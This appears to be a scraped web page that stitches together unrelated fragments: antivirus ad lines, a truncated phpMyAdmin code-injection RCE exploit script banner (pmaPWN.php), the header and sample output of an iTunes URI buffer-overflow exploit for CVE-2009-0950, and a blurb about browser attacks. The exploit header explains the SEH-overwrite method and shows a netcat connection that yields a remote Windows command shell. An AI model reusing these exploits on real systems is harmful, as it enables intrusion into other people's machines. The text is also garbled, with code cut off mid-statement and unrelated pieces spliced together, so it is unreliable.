Make sure it get the latest spyware definitions.
Scanned real malicious and it works!
Customize your personal settings
Memory footprint when observed from ProcessExplorer
1) {
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP version original http://milw0rm.com/exploits/8921\n";
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
print " greetz: Hacking Expose!, HM Security, darkc0de\n";
print "|****************************************************************|\n";
print "\n";
print "Usage: php $argv[0] \n";
exit;
}
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP version original http://milw0rm.com/exploits/8921\n";
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
print " greetz: Hacking Expose!, HM Security, darkc0de\n";
print "|****************************************************************|\n";
print "\n";
$Handlex = FOpen("pmaPWN.log", "a+");
FWrite($Handlex, "|****************************************************************|\n");
FWrite($Handlex, " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n");
FWrite($Handlex, " phpMyAdmin Code Injection RCE Scanner & Exploit\n");
FWrite($Handlex, " This is PHP version original http://milw0rm.com/exploits/8921\n");
FWrite($Handlex, " credit: Greg Ose, pagvac @ gnucitizen.org\n");
FWrite($Handlex, " greetz: Hacking Expose!, HM Security, darkc0de\n");
FWrite($Handlex, "|****************************************************************|\n\n");#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# www.offensive-security.com/blog/vulndev/itunes-exploitation-case-study/
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce - 06/10/2009
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
#
# Vulnerability can't be exploited simply overwriting a return address on the
# stack because of stack canary protection. Increasing buffer size leads to
# SEH overwrite but it seems that the Access Violation needed to get our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# - the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# - the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the vulnerability from Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Mozilla Firefox>
Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”
Other areas the paper covers include:
• The shift in spam to mainly malicious web link usage
• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites
• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website
• Use of malicious video banners placed in advertisement networks
• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site















